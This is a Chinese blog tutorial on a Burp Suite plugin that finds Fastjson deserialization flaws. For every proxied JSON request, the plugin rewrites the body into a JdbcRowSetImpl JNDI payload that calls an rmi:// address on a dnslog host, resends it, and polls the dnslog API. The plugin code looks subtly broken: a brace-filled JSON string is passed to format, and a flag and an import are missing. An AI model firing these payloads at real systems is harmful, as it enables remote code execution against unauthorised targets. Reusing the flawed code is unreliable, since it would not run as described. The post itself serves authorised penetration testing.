BurpSuite插件开发之Fastjson自动化检测

前言

之前做渗透测试的时候遇到过一个问题,当时的渗透测试项目发现个漏洞是XXE漏洞,这个漏洞是手工发现的,当时也挂着扫描器的被动扫描模式也扫了一遍,但是没扫到。当时是利用插件的形式简单实验了下,但是漏报太多了。

趁着有时间,把之前计划的Burp Suite插件开发给做掉。

0x01 Fastjson反序列化漏洞

简介

Fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。

Fastjson相对其他JSON库的特点是快,从2011年Fastjson发布1.1.x版本之后,其性能从未被其他Java实现的JSON库超越。

之前做XXE测试的时候如果遇到Content-Typeapplication/json的时候都喜欢改为`application/xml然后发个XXE的payload探测能不能解析xml文档,再进行下一步的测试,现在又要加Fastjson、Jackson的payload来测试是否有RCE的漏洞,这样的话效率就太低了。

由于大部分的测试都离不开Burp,所以,借助Burp插件即可帮我们自动化进行这些测试。

0x02 插件中用到的类和方法

由于我们的目标是想实现只要有流量就对流量进行筛选,然后进行漏洞探测,所以并不是需要触发才扫描的。这样,文档找起来范围就缩小很多了。

2.1 IBurpExtender

所有插件都必须实现这个接口。当我们在加载插件时,默认会调用IBurpExtender类下的registerExtenderCallbacks方法,并传递一个IBurpExtenderCallbacks对象,此对象在编写插件时会经常用到。

2.2 IHttpListener

该类是用来注册HTTP监听器,然后对获取到的请求或响应包进行处理,有个processHttpMessage的方法用于对请求和响应的数据包进行自定义操作,该方法在发送请求之前和接收响应之后会被调用。

2.3 registerExtenderCallbacks

当我们在加载插件时,默认会调用IBurpExtender类下的registerExtenderCallbacks方法,并传递一个IBurpExtenderCallbacks对象,提供可由扩展调用的方法以执行各种操作。

2.4 processHttpMessage

这是IHttpListener接口中唯一一个需要实现的方法,当通过IBurpExtenderCallbacks.registerHttpListener()注册了HTTP监听器后,所有的流量都会先传入processHttpMessage方法中进行处理。

ending…

真的就用到这么多…

0x03 代码实现

这里只以Fastjson为例,其他同理。

代码逻辑为监听所有来自proxy、repeater的流量,检查请求头和响应头中content-type的值是否为json,如果是,则格式化payload,build之后重新发送。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
# /usr/bin/env python
# _*_ coding:utf-8 _*_
__author__ = '瓦都剋'
from burp import IBurpExtender
from burp import IHttpListener
from burp import IHttpRequestResponse
from burp import IResponseInfo
from burp import IRequestInfo
from burp import IHttpService
import sys
import time
import os
import re
from hashlib import md5
import random
def randmd5():
new_md5 = md5()
new_md5.update(str(random.randint(1, 1000)))
return new_md5.hexdigest()[:6]
class BurpExtender(IBurpExtender, IHttpListener):
def registerExtenderCallbacks(self, callbacks):
print("[+] #####################################")
print("[+] Fastjson Scan")
print("[+] Author: 瓦都剋")
print("[+] Email: admin@w2n1ck.com")
print("[+] Blog: https://www.w2n1ck.com")
print("[+] #####################################")
self._callbacks = callbacks
self._helpers = callbacks.getHelpers()
callbacks.setExtensionName('Fastjson Scan')
callbacks.registerHttpListener(self)
def processHttpMessage(self, toolFlag, messageIsRequest, messageInfo):
# if toolFlag == self._callbacks.TOOL_PROXY or toolFlag == self._callbacks.TOOL_REPEATER:
if toolFlag == self._callbacks.TOOL_PROXY or toolFlag == self._callbacks.TOOL_REPEATER:
# 监听Response
if not messageIsRequest:
'''请求数据'''
# 获取请求包的数据
resquest = messageInfo.getRequest()
analyzedRequest = self._helpers.analyzeRequest(resquest)
request_header = analyzedRequest.getHeaders()
request_bodys = resquest[analyzedRequest.getBodyOffset():].tostring()
request_host, request_Path = self.get_request_host(request_header)
request_contentType = analyzedRequest.getContentType()
'''响应数据'''
# 获取响应包数据
response = messageInfo.getResponse()
analyzedResponse = self._helpers.analyzeResponse(response) # returns IResponseInfo
response_headers = analyzedResponse.getHeaders()
response_bodys = response[analyzedResponse.getBodyOffset():].tostring()
response_statusCode = analyzedResponse.getStatusCode()
expression = r'.*(application/json).*'
for rpheader in response_headers:
if rpheader.startswith("Content-Type:") and re.match(expression, rpheader):
response_is_json = True
# 获取服务信息
httpService = messageInfo.getHttpService()
port = httpService.getPort()
host = httpService.getHost()
# 请求类型或响应类型是application/json
if response_is_json or request_contentType == 4:
randomStr = randmd5()
payload = '{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://{}.{}_{}.xxxxxx.ceye.io/Exploit","autoCommit":true}}'
newBodyPayload = payload.format(str(randomStr), str(host), str(port))
print(newBodyPayload)
# 将字符串转换为字节 https://portswigger.net/burp/extender/api/burp/IExtensionHelpers.html#stringToBytes(java.lang.String)
newBody = self._helpers.stringToBytes(newBodyPayload)
# 重构json格式的数据不能用buildParameter,要用buildHttpMessage替换整个body重构http消息。https://portswigger.net/burp/extender/api/burp/IExtensionHelpers.html#buildHttpMessage(java.util.List,%20byte[])
newRequest = self._helpers.buildHttpMessage(request_header, newBody)
ishttps = False
expression = r'.*(443).*'
if re.match(expression, str(port)):
ishttps = True
rep = self._callbacks.makeHttpRequest(host, port, ishttps, newRequest)
# 获取请求的url
def get_request_host(self, reqHeaders):
uri = reqHeaders[0].split(' ')[1]
host = reqHeaders[1].split(' ')[1]
return host, uri
# 获取请求的一些信息:请求头,请求内容,请求方法,请求参数
def get_request_info(self, request):
analyzedIRequestInfo = self._helpers.analyzeRequest(request)
reqHeaders = analyzedIRequestInfo.getHeaders()
reqBodys = request[analyzedIRequestInfo.getBodyOffset():].tostring()
reqMethod = analyzedIRequestInfo.getMethod()
reqParameters = analyzedIRequestInfo.getParameters()
reqHost, reqPath = self.get_request_host(reqHeaders)
reqContentType = analyzedIRequestInfo.getContentType()
print(reqHost, reqPath)
return analyzedIRequestInfo, reqHeaders, reqBodys, reqMethod, reqParameters, reqHost, reqContentType
# 获取响应的一些信息:响应头,响应内容,响应状态码
def get_response_info(self, response):
analyzedIResponseInfo = self._helpers.analyzeRequest(response)
resHeaders = analyzedIResponseInfo.getHeaders()
resBodys = response[analyzedIResponseInfo.getBodyOffset():].tostring()
# getStatusCode获取响应中包含的HTTP状态代码。返回:响应中包含的HTTP状态代码。
# resStatusCode = analyzedIResponseInfo.getStatusCode()
return resHeaders, resBodys
# 获取服务端的信息,主机地址,端口,协议
def get_server_info(self, httpService):
host = httpService.getHost()
port = httpService.getPort()
protocol = httpService.getProtocol()
return host, port, protocol
# 获取请求的参数名、参数值、参数类型(get、post、cookie->用来构造参数时使用)
def get_parameter_Name_Value_Type(self, parameter):
parameterName = parameter.getName()
parameterValue = parameter.getValue()
parameterType = parameter.getType()
return parameterName, parameterValue, parameterType
def doActiveScan(self, baseRequestResponse, insertionPoint):
pass
def doPassiveScan(self, baseRequestResponse):
self.issues = []
self.start_run(baseRequestResponse)
return self.issues
def consolidateDuplicateIssues(self, existingIssue, newIssue):
'''
相同的数据包,只报告一份报告
:param existingIssue:
:param newIssue:
:return:
'''
if existingIssue.getIssueDetail() == newIssue.getIssueDetail():
return -1
return 0
class CustomScanIssue(IScanIssue):
def __init__(self, httpService, url, httpMessages, name, detail, severity):
'''
:param httpService: HTTP服务
:param url: 漏洞url
:param httpMessages: HTTP消息
:param name: 漏洞名
:param detail: 漏洞细节
:param severity: 漏洞等级
'''
self._httpService = httpService
self._url = url
self._httpMessages = httpMessages
self._name = name
self._detail = detail
self._severity = severity
def getUrl(self):
return self._url
def getIssueName(self):
return self._name
def getIssueType(self):
return 0
def getSeverity(self):
return self._severity
def getConfidence(self):
return "Certain"
def getIssueBackground(self):
pass
def getRemediationBackground(self):
pass
def getIssueDetail(self):
return self._detail
def getRemediationDetail(self):
pass
def getHttpMessages(self):
return self._httpMessages
def getHttpService(self):
return self._httpService

后面的一些方法和类是为了后续实现其他东西自己预留的。

0x04 漏洞检测

加载插件

部署docker漏洞环境,请求数据

1
curl http://x.x.x.x:8090 -x http://127.0.0.1:8080 -H "Content-Type: application/json" --data '{"name":"hello", "age":30}'

由于插件是自动的,同时也没有编写界面,可以使用logger++查看。

从上图可以看大片序号33是代理的流量,由于符合规则,所以紧接着就调用了我们编写的插件,并自动填充payload并发送

在dnslog中成功查看到攻击请求

0x04 漏洞告警

所有的payload可使用dnslog进行,并利用对应的API来获取数据,我这里使用的ceye.io,也可以自己用开源的vtest等自己搭建一套。

4.1 获取接口数据

为了准确,在payload中设置了随机字符。使用API获取数据

1
2
3
4
5
6
7
8
9
10
11
12
13
14
_ceye_url = "http://api.ceye.io:80/v1/records?token=xxx&type={}&filter="
ceye_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
query_type = ['http','dns']
for _type in query_type:
ceye_url = _ceye_url.format(_type)
con = requests.get(ceye_url, headers=ceye_headers, timeout=30)
status_code = con.status_code
_content = json.loads(con.content)
if status_code == 200 and "ceye.io" in str(_content) and randomStr in str(_content):
for i in range(len(_content['data'])):
ip = _content['data'][i]['remote_addr']
if ip not in all_ip_list:
# print(ip, all_ip_list)
all_ip_list.append(ip)

4.2 定时任务

做个定时任务轮询获取

1
2
3
[root@Centos ~]# cd /var/spool/cron/
[root@Centos cron]# cat root
*/10 * * * * /usr/bin/python /root/ceye_monior/ceye_monior.py

4.3 漏洞推送

漏洞推送可以结合各种机器人,比如钉钉、企业微信、TG等,这里我用了别人直接开发好的微信推送:Server酱

他这个服务有个存储型XSS,作者给修成了这个吊样。。。

点进去之后即可查看详情了

0x05 扩展

Fastjson的payload很多,可以自己写个列表循环执行下即可,Jackson同理。

另外,XXE、SSRF等都可以利用此方法实现,搜了下,GitHub已经有代码了:https://github.com/yandex/burp-molly-pack/,照着代码根据自己需求改下就好了。

用着非常舒服,再扩展扩展,还要什么PassiveScan,要什么扫描器,要什么自行车~

参考文章:

https://cloud.tencent.com/developer/article/1166490

https://forum.portswigger.net/thread/scanner-vs-processhttpmessage-python-ef82b3ef

https://github.com/yandex/burp-molly-pack/

https://xz.aliyun.com/t/7065

https://portswigger.net/burp/extender/api/

大爷,赏个铜板呗!